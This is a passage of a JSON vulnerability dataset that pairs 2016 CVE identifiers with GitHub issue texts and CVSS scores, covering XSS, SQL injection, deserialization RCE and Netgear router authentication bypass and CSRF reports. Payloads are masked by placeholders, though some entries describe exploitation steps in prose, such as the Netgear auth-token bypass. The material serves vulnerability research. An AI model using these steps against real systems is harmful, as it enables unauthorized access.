        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-10514",
        "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/547",
        "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/547",
        "Repo_new": "piwigo/piwigo",
        "Issue_Created_At": "2016-11-17T12:37:46Z",
        "description": "increase checks on url format. Basic filter_var($url, FILTER_VALIDATE_URL, FILTER_FLAG_SCHEME_REQUIRED | FILTER_FLAG_HOST_REQUIRED) is not very strong. We need something stronger.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-10519",
        "Issue_Url_old": "https://github.com/feross/bittorrent-dht/issues/87",
        "Issue_Url_new": "https://github.com/webtorrent/bittorrent-dht/issues/87",
        "Repo_new": "webtorrent/bittorrent-dht",
        "Issue_Created_At": "2016-01-02T21:59:46Z",
        "description": "IMPORTANT: Critical security issue fixed in NUMBERTAG All users should upgrade.. We just fixed a security issue in the APITAG module that would allow an attacker to send a specific series of messages to a listening peer to make it disclose internal memory of the FILETAG process. All users of APITAG should upgrade to version NUMBERTAG or later.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-10523",
        "Issue_Url_old": "https://github.com/mcollina/mosca/issues/393",
        "Issue_Url_new": "https://github.com/moscajs/mosca/issues/393",
        "Repo_new": "moscajs/mosca",
        "Issue_Created_At": "2016-01-14T15:53:51Z",
        "description": "Mosca crashes when connecting with TLS on MQTT Port. By accident we have found critical behavior in Mosca: when connecting with a TLS connection on the plain mqtt port, the whole broker simple crashes with error: ERRORTAG One liner to reproduce this behavior (assuming standard mosca running on localhost): APITAG We will dig further into it and provide a PR if we have a fix. Meanwhile we wanted to share the bug in case somebody is quicker in spotting the solution.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-10525",
        "Issue_Url_old": "https://github.com/dwyl/hapi-auth-jwt2/issues/111",
        "Issue_Url_new": "https://github.com/dwyl/hapi-auth-jwt2/issues/111",
        "Repo_new": "dwyl/hapi-auth-jwt2",
        "Issue_Created_At": "2015-10-14T19:20:42Z",
        "description": "Regression: APITAG is true and APITAG is {} when user not logged in. With the latest version of the plugin my APITAG routes exhibit this behaviour. This did not happen previously.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-10527",
        "Issue_Url_old": "https://github.com/riot/compiler/issues/46",
        "Issue_Url_new": "https://github.com/riot/compiler/issues/46",
        "Repo_new": "riot/compiler",
        "Issue_Created_At": "2016-01-16T18:23:33Z",
        "description": "NUMBERTAG unpublished. riot compiler NUMBERTAG has an issue in a regex APITAG Backtracking) thats make it unusable under certain conditions, so it is unpublished now.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-10533",
        "Issue_Url_old": "https://github.com/florianholzapfel/express-restify-mongoose/issues/252",
        "Issue_Url_new": "https://github.com/florianholzapfel/express-restify-mongoose/issues/252",
        "Repo_new": "florianholzapfel/express-restify-mongoose",
        "Issue_Created_At": "2016-02-13T08:48:50Z",
        "description": "Leaking private/protected data. say you have an User model: APITAG normally you want to never expose the password, under any circumstances, so you'd normally do: APITAG Now this works with hitting any endpoint: APITAG does not show the fields APITAG also does not show the password HOWEVER: APITAG shows ALL passwords for ALL users in the database ... This is a huge security concern",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-10534",
        "Issue_Url_old": "https://github.com/electron-userland/electron-packager/issues/333",
        "Issue_Url_new": "https://github.com/electron/electron-packager/issues/333",
        "Repo_new": "electron/electron-packager",
        "Issue_Created_At": "2016-04-19T01:29:54Z",
        "description": "SECURITY NOTICE: electron packager NUMBERTAG don't check SSL certificate validity. There exists a bug in electron packager from versions NUMBERTAG where the APITAG command line option defaults to false when not explicitly set to true . This only affects users using the electron packager CLI. The APITAG option defaults to true for the FILETAG API. The commit that introduced the issue is here: URLTAG The issue is fixed in NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.9,
        "impactScore": 3.6,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2016-10538",
        "Issue_Url_old": "https://github.com/node-js-libs/cli/issues/81",
        "Issue_Url_new": "https://github.com/node-js-libs/cli/issues/81",
        "Repo_new": "node-js-libs/cli",
        "Issue_Created_At": "2016-06-16T08:30:30Z",
        "description": "[security] Insecure usage of temporary files.. The current code makes use of predictable filenames, in a way that causes a security issue. I reported this to Debian last year: CVETAG It was recently highlighted by the nodesecurity people (six months later!): URLTAG Suggested fix: Avoid using predictable filenames in world writable directories. Using APITAG would be better than APITAG for example.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N",
        "severity": "LOW",
        "baseScore": 3.5,
        "impactScore": 1.4,
        "exploitabilityScore": 2.1
    },
    {
        "CVE_ID": "CVE-2016-10542",
        "Issue_Url_old": "https://github.com/nodejs/node/issues/7388",
        "Issue_Url_new": "https://github.com/nodejs/node/issues/7388",
        "Repo_new": "nodejs/node",
        "Issue_Created_At": "2016-06-23T16:09:20Z",
        "description": "Error: APITAG failed exploit/(d)dos?. Version NUMBERTAG Platform : Linu NUMBERTAG generic APITAG Ubuntu SMP Thu Jun NUMBERTAG UTC NUMBERTAG APITAG APITAG Node server using socket.io is getting hit by some kind of attack that makes it crash, with the error APITAG failed\". At first I thought I'm just trying to process some really long string sent via sockets by an user, but it's not, it crashes even without doing anything with the messages coming in from the socket events. The code below is the most barebones I could get the actual server while still having it be vulnerable to whatever this is. The \"socketio wildcard\" was only added to this so I could see all the events sent in, but there is none when it's actually crashing, just a new connection opening then it goes down. It's definitely some sort of attack or exploit, cloning the server to a different IP made it stop, until after the new was released to the public (site put back online). There were also some spikes in traffic but they didn't coincide with the actual crashes so I'm gonna assume they were just some failed ddos attempts not related to this issue. Anyone encountered this before? Code: ERRORTAG Error: ERRORTAG Full log of the output when crashing: URLTAG Couldn't do anymore logging because after some time the \"attack\" stopped, it used to keep going even after the server crashed, but right now it seems to be more \"calculated\" so to speak, stopping as soon as the server crashes, making it really difficult for me to debug anything.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-10543",
        "Issue_Url_old": "https://github.com/hapijs/hapi/issues/3228",
        "Issue_Url_new": "https://github.com/hapijs/hapi/issues/3228",
        "Repo_new": "hapijs/hapi",
        "Issue_Created_At": "2016-07-04T04:26:55Z",
        "description": "Update hapijs/call to NUMBERTAG from NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-10547",
        "Issue_Url_old": "https://github.com/mozilla/nunjucks/issues/835",
        "Issue_Url_new": "https://github.com/mozilla/nunjucks/issues/835",
        "Repo_new": "mozilla/nunjucks",
        "Issue_Created_At": "2016-09-07T03:56:25Z",
        "description": "Bypass autoescape / XSS. The following string works as expected: ERRORTAG If however the variable passed to the template is an array autoescape does nothing: ERRORTAG If a autoescape is on any variable that is rendered in a {{ }} block I would expect it to escaped. This looks to be intentional from: URLTAG In express / Koa / (anything else using qs or body parser) is is trivial to coerce. See the following simple example in express: ERRORTAG APITAG I created a more detailed writeup and example app at: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-10551",
        "Issue_Url_old": "https://github.com/balderdashy/waterline/issues/1219",
        "Issue_Url_new": "https://github.com/balderdashy/sails/issues/5347",
        "Repo_new": "balderdashy/sails",
        "Issue_Created_At": "2015-11-17T01:15:37Z",
        "description": "SQL Injection with default blueprints in Waterline. I have a model called \"patients\" which is using the default find blueprint in sails (it's controller definition is just APITAG ). I have a sinking suspicion it may have to do with node mysql not actually supporting prepared statements ( URLTAG I'm able to recreate the issue on any string field by passing in APITAG in APITAG as a where criteria. E.g. this: APITAG Returns all records in the patients table. Scary. I have: APITAG In my FILETAG . Has anyone else experienced anything similar?",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-10555",
        "Issue_Url_old": "https://github.com/hokaccha/node-jwt-simple/issues/14",
        "Issue_Url_new": "https://github.com/hokaccha/node-jwt-simple/issues/14",
        "Repo_new": "hokaccha/node-jwt-simple",
        "Issue_Created_At": "2015-04-01T16:41:32Z",
        "description": "Add a verify(token, algorithm, APITAG method as per this posting regarding vulnerabilities in jwt: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-10556",
        "Issue_Url_old": "https://github.com/sequelize/sequelize/issues/5671",
        "Issue_Url_new": "https://github.com/sequelize/sequelize/issues/5671",
        "Repo_new": "sequelize/sequelize",
        "Issue_Created_At": "2016-03-29T12:15:17Z",
        "description": "sql injection in \"IN\" statement. i'm using mssql. sequelize version is NUMBERTAG sample: ERRORTAG because tedious doesn't support arrays as parameters you must add a parameter for every item in the array and use it in the query ( APITAG ). now there is an option to do sql injection.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-10663",
        "Issue_Url_old": "https://github.com/wixtoolset/issues/issues/6187",
        "Issue_Url_new": "https://github.com/wixtoolset/issues/issues/6187",
        "Repo_new": "wixtoolset/issues",
        "Issue_Created_At": "2020-06-10T22:51:59Z",
        "description": "Has CVETAG been addressed?. CVETAG concerns Wix but I can't see it addressed anywhere in the issues list. Are you aware of it and what's the resolution, if any? URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2016-10707",
        "Issue_Url_old": "https://github.com/jquery/jquery/issues/3133",
        "Issue_Url_new": "https://github.com/jquery/jquery/issues/3133",
        "Repo_new": "jquery/jquery",
        "Issue_Created_At": "2016-05-29T19:06:12Z",
        "description": "Boolean attribute getters throw if the attribute name is not all lowercase. APITAG Description In NUMBERTAG we removed our logic that lowercased attribute names. This caused one regression: any attribute getter using a name for boolean attributes but not all lowercased is going into an infinite recursion, exceeding the stack call limit. Amongst others, this is breaking the APITAG test suite when tested with APITAG NUMBERTAG rc1. Link to test case URLTAG Basically, APITAG is enough to trigger the error.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-10718",
        "Issue_Url_old": "https://github.com/brave/browser-laptop/issues/5007",
        "Issue_Url_new": "https://github.com/brave/browser-laptop/issues/5007",
        "Repo_new": "brave/browser-laptop",
        "Issue_Created_At": "2016-10-20T16:30:26Z",
        "description": "the last open tab should only be saved if the window is closed. Did you search for similar issues before submitting this one? Yes Describe the issue you encountered: If you have a single window with only one tab and you close the tab itself that tab should not be restored on the next load. It should only be saved if the window is closed while the tab is still open. This is one of two bugs that enables a APITAG from URLTAG Expected behavior: If the tab is closed it should not be restored when Brave is opened again Platform APITAG NUMBERTAG APITAG Linux distro?): Win and Linux Brave Version NUMBERTAG Steps to reproduce NUMBERTAG Open this page CODETAG NUMBERTAG Click the link to close the tab NUMBERTAG Reopen Brave If the page is changed to call the script without the click it becomes a APITAG on Windows and Linux if it is the only tab in the last window",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-10718",
        "Issue_Url_old": "https://github.com/brave/browser-laptop/issues/5006",
        "Issue_Url_new": "https://github.com/brave/browser-laptop/issues/5006",
        "Repo_new": "brave/browser-laptop",
        "Issue_Created_At": "2016-10-20T16:26:46Z",
        "description": "APITAG should be blocked unless the script also opened the tab. Did you search for similar issues before submitting this one? Yes Describe the issue you encountered: From URLTAG It is possible for a tab to close itself even if the tab was not opened by a script. In Chrome this is blocked with the message Scripts may close only the windows that were opened by it which is controlled by webkit APITAG APITAG . Expected behavior: APITAG should only allow a tab to be closed if it was opened by the script Platform APITAG NUMBERTAG APITAG Linux distro?): All Brave Version NUMBERTAG Steps to reproduce NUMBERTAG Open a page with CODETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-10721",
        "Issue_Url_old": "https://github.com/Thomas-Tsai/partclone/issues/82",
        "Issue_Url_new": "https://github.com/thomas-tsai/partclone/issues/82",
        "Repo_new": "thomas-tsai/partclone",
        "Issue_Created_At": "2016-11-14T22:05:40Z",
        "description": "Restore Heap Overflow. ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-10722",
        "Issue_Url_old": "https://github.com/Thomas-Tsai/partclone/issues/71",
        "Issue_Url_new": "https://github.com/thomas-tsai/partclone/issues/71",
        "Repo_new": "thomas-tsai/partclone",
        "Issue_Created_At": "2016-01-05T18:58:27Z",
        "description": "FAT Bitmap Heap Overflow. ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-10735",
        "Issue_Url_old": "https://github.com/twbs/bootstrap/issues/20184",
        "Issue_Url_new": "https://github.com/twbs/bootstrap/issues/20184",
        "Repo_new": "twbs/bootstrap",
        "Issue_Created_At": "2016-06-27T15:33:54Z",
        "description": "XSS in data target attribute. The data target attribute is vulnerable to Cross Site Scripting attacks: APITAG APITAG APITAG APITAG APITAG APITAG APITAG This is safe in HTML, but becomes vulnerable with Bootstrap.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-10735",
        "Issue_Url_old": "https://github.com/twbs/bootstrap/issues/27915",
        "Issue_Url_new": "https://github.com/twbs/bootstrap/issues/27915",
        "Repo_new": "twbs/bootstrap",
        "Issue_Created_At": "2018-12-23T16:23:10Z",
        "description": "Github considers bootstrap NUMBERTAG as insecure. Hi Bootstrap team. Github considers bootstrap NUMBERTAG as an insecure dependency via its security vulnerabilities alerts tool: URLTAG It points to the URLTAG page and this page shows that only NUMBERTAG is secure. Does NUMBERTAG is safe to use as it has a fix for the URLTAG vulnerability or it is something different? screenshot from one of our private projects FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-10744",
        "Issue_Url_old": "https://github.com/select2/select2/issues/4587",
        "Issue_Url_new": "https://github.com/select2/select2/issues/4587",
        "Repo_new": "select2/select2",
        "Issue_Created_At": "2016-09-15T13:35:32Z",
        "description": "XSS vulnerability in URLTAG Under APITAG remote data\", the data that is retrieved remotely is not sanitized before displaying it, and this should be done to prevent XSS issues. For example, when I enter _je1_ in the input field, one of the retrieved APITAG repo's data contains malicious JS code that is executed and that simulates a fake APITAG page which asks for your credit card info (seems like phishing).",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-10749",
        "Issue_Url_old": "https://github.com/DaveGamble/cJSON/issues/30",
        "Issue_Url_new": "https://github.com/davegamble/cjson/issues/30",
        "Repo_new": "davegamble/cjson",
        "Issue_Created_At": "2016-10-01T08:19:37Z",
        "description": "cJSON buffer overflow with odd formatted JSON string. Hi, I would like to report a buffer overflow in cJSON, you can test this APITAG with a ODD string CODETAG building it with ASAN will trigger a out of bound on the input string, which it can be problematic since in lot of use cases the JSON input to applications using cJSON is untrusted. Thanks Marco > APITAG NUMBERTAG ERROR: APITAG global buffer overflow on address NUMBERTAG d5 at pc NUMBERTAG fb bp NUMBERTAG fff5fbff2a0 sp NUMBERTAG fff5fbff NUMBERTAG READ of size NUMBERTAG at NUMBERTAG d5 thread T NUMBERTAG fa in parse_string APITAG NUMBERTAG a NUMBERTAG in parse_value APITAG NUMBERTAG bb in APITAG APITAG NUMBERTAG dfa in APITAG APITAG NUMBERTAG e NUMBERTAG in main APITAG NUMBERTAG fff NUMBERTAG bb5ac in start APITAG NUMBERTAG d5 is located NUMBERTAG bytes to the right of global variable '<string literal>' defined in PATHTAG NUMBERTAG c0) of size NUMBERTAG string literal>' is ascii string NUMBERTAG SUMMARY: APITAG global buffer overflow APITAG in parse_string > Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG d NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG e NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f9 > Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): > Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa > Heap right redzone: fb > Freed heap region: fd > Stack left redzone: f1 > Stack mid redzone: f2 > Stack right redzone: f3 > Stack partial redzone: f4 > Stack after return: f5 > Stack use after scope: f8 > Global redzone: f9 > Global init order: f6 > Poisoned by user: f7 > Container overflow: fc > Array cookie: ac > Intra object redzone: bb > APITAG internal: fe > Left alloca redzone: ca > Right alloca redzone: cb NUMBERTAG ABORTING >",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-10750",
        "Issue_Url_old": "https://github.com/hazelcast/hazelcast/issues/8024",
        "Issue_Url_new": "https://github.com/hazelcast/hazelcast/issues/8024",
        "Repo_new": "hazelcast/hazelcast",
        "Issue_Created_At": "2016-04-26T20:29:27Z",
        "description": "Hazelcast is vulnerable to untrusted deserialization remote code execution. I emailed the support address on April NUMBERTAG and received a response indicating that I should report my findings here. So here we are. The Hazelcast cluster join procedure is vulnerable to remote code execution due to Java deserialization. If an attacker can reach a listening Hazelcast instance with a crafted APITAG , and vulnerable classes are also on the classpath, the attacker can run arbitrary shell commands (among other nefarious things). Hazelcast will blindly deserialize any object it receives in that request stream. Since the APITAG is what implements authentication, this is necessarily pre authentication. This was verified against the latest code from the Git repository, as well as releases NUMBERTAG and NUMBERTAG I have a small whitelist/blacklist filter patch that I can submit a PR for, once I'm cleared to do so. I've already emailed the signed form. Or if you have another solution, feel free! If you choose to go the filtering route, the Hazelcast team should probably create a default whitelist for serialization, because blacklists are almost always out of date as soon as they are created.",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2016-10937",
        "Issue_Url_old": "https://github.com/lefcha/imapfilter/issues/142",
        "Issue_Url_new": "https://github.com/lefcha/imapfilter/issues/142",
        "Repo_new": "lefcha/imapfilter",
        "Issue_Created_At": "2016-11-25T18:26:37Z",
        "description": "No certificate verification. Apparently imapfilter is not checking the certificate after connecting to the imap server, or I am missing something. If the DNS is compromised by some hacker and imapfilter is directed to a fake IP address, the certificate supplied by that IP address will be accepted as valid if it is properly signed. What I mean is that if imapfilter is expecting to connect to APITAG and the server signed and valid certificate is from APITAG the connection will go through even if that is not the expected server. Apparently you have to use a SSL validate callback to solve that (SSL_CTX_set_verify)",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-11014",
        "Issue_Url_old": "https://github.com/cybersecurityworks/Disclosed/issues/14",
        "Issue_Url_new": "https://github.com/cybersecurityworks/disclosed/issues/14",
        "Repo_new": "cybersecurityworks/disclosed",
        "Issue_Created_At": "2016-01-11T07:53:05Z",
        "description": "Authentication Bypass in Netgear Router JNR NUMBERTAG ersion NUMBERTAG Details ================ Product Vendor: Netgear Bug Name: Authentication Bypass in Netgear Router JNR NUMBERTAG ersion NUMBERTAG Software: Netgear Router JNR NUMBERTAG Firmware Version NUMBERTAG Last Updated: APITAG NUMBERTAG APITAG Homepage: FILETAG Severity High Status: APITAG Fixed APITAG POC Video URL: URLTAG Description ================ This flaw may allow a successful attacker to do anything gaining the privilege of the router being in LAN/WAN. Proof of concept: (POC) ================== APITAG Authentication & Session Management: APITAG APITAG Bypass: APITAG Try Accessing the URL which the normal user have no longer access without credentials with auth token value as \u201cok\u201d and HTTP Basic Authentication header with password value. APITAG Session Management: APITAG Create a fake Session ID and submit the request to the server with the credentials. Whereas, you can see that the session id has no change even after getting logged in and during logout process. FILETAG APITAG NUMBERTAG APITAG Session id created by an attacker before login FILETAG APITAG NUMBERTAG APITAG Attacker Session id is not changed even after login FILETAG APITAG NUMBERTAG APITAG Session id remains the same even after logging out from the current session. FILETAG APITAG NUMBERTAG APITAG Back button history of the accessed router after logging out FILETAG APITAG NUMBERTAG APITAG auth token is set to \u201cok\u201d once after logging into the router. But, we couldn\u2019t access any pages just by pressing back button after logging out FILETAG APITAG NUMBERTAG APITAG Changing the auth token value from \u201cok\u201d to \u201cnok\u201d and removing extra session tokens will give access to the unauthorized page with the same session id created by an attacker. FILETAG APITAG NUMBERTAG APITAG Authentication logic is bypassed and an attacker can access any pages inside login without credentials APITAG APITAG PATHTAG \u2013 Discovered in Netgear Router Firmware Version NUMBERTAG PATHTAG Reported to vendor through support option but, no response PATHTAG Reported to vendor through another support option available APITAG here APITAG . But, again no response. PATHTAG Finally, Technical Team started addressing about the issue after so many followups through phone/mail. PATHTAG Vulnerability got fixed & case was closed. PATHTAG Netgear Released updated Netgear Router JNR NUMBERTAG ersion NUMBERTAG APITAG by: APITAG Sathish from APITAG Cyber Security Works Pvt Ltd APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-11015",
        "Issue_Url_old": "https://github.com/cybersecurityworks/Disclosed/issues/13",
        "Issue_Url_new": "https://github.com/cybersecurityworks/disclosed/issues/13",
        "Repo_new": "cybersecurityworks/disclosed",
        "Issue_Created_At": "2016-01-11T05:52:35Z",
        "description": "Cross Site Request Forgery in Netgear Router JNR NUMBERTAG ersion NUMBERTAG Details ================ Product Vendor: Netgear Bug Name: Cross Site Request Forgery in Netgear Router JNR NUMBERTAG ersion NUMBERTAG Software: Netgear Router Firmware Version NUMBERTAG Last Updated: APITAG NUMBERTAG APITAG Homepage: FILETAG Severity High Status: APITAG Fixed APITAG POC Video URL: URLTAG Description ================ Using this flaw, an attacker can cause victims to change any data the victim is allowed to change or perform any function the victim is authorized to use. Proof of concept: (POC) ================== Created a forged request changing the value of any variable, here it is APITAG APITAG APITAG variable in the URL URLTAG and sent it to victim forcing him/her to click on the malicious link generated by an attacker with different session allows an attacker to change the settings of the victim\u2019s router. FILETAG APITAG NUMBERTAG APITAG Blocked sites keywords before CSRF request sent to the victim FILETAG APITAG NUMBERTAG APITAG a CSRF Request is created by changing Block list URL variable FILETAG APITAG NUMBERTAG APITAG CSRF request is successfully submitted in the victims browser Note: Similarly, we can manipulate any request and can force victim to access the link generated by the attacker to make changes to the router settings without victim\u2019s knowledge. APITAG APITAG PATHTAG \u2013 Discovered in Netgear Router Firmware Version NUMBERTAG PATHTAG Reported to vendor through support option but, no response PATHTAG Reported to vendor through another support option available APITAG here APITAG . But, again no response. PATHTAG Finally, Technical Team started addressing about the issue after so many followups through phone/mail. PATHTAG Vulnerability got fixed & case was closed. PATHTAG Netgear Released updated version NUMBERTAG APITAG by: APITAG Sathish from APITAG Cyber Security Works Pvt Ltd APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-11016",
        "Issue_Url_old": "https://github.com/cybersecurityworks/Disclosed/issues/12",
        "Issue_Url_new": "https://github.com/cybersecurityworks/disclosed/issues/12",
        "Repo_new": "cybersecurityworks/disclosed",
        "Issue_Created_At": "2016-01-09T12:31:10Z",
        "description": "Multiple Cross Site Scripting in Netgear Router Version NUMBERTAG Details ================ Product Vendor: Netgear Bug Name: Cross Site Scripting in Netgear Router Version NUMBERTAG Software: Netgear Router Firmware Version NUMBERTAG Last Updated: APITAG NUMBERTAG APITAG Homepage: FILETAG Severity High Vulnerable URL: APITAG URLTAG APITAG Vulnerable Variable: APITAG getpage, var:page & var:menu APITAG Parameter: GET Status: APITAG Fixed APITAG Exploitation Requires Authentication?: no POC URL: URLTAG Description ================ Cross Site Scripting (XSS) vulnerability in Netgear Router Firmware Version NUMBERTAG By exploiting a Cross site scripting vulnerability the attacker can hijack a logged in user\u2019s session by stealing cookies. This means that the malicious hacker can change the logged in user\u2019s password and invalidate the session of the victim while the hacker maintains access. Proof of concept: (POC) ================== Inject the malicious APITAG code APITAG in the APITAG getpage APITAG variable in the URL APITAG URLTAG APITAG and viewing it on browser will result in execution of Cross Site Scripting (XSS) APITAG APITAG Similarly, APITAG var:page APITAG & APITAG var:menu APITAG variable is also injected with malicious APITAG payload and use it as a vehicle for further attack. APITAG NUMBERTAG APITAG The GET request parameter APITAG getpage APITAG variable in the following URL APITAG URLTAG APITAG is vulnerable to Cross Site Scripting (XSS). FILETAG APITAG 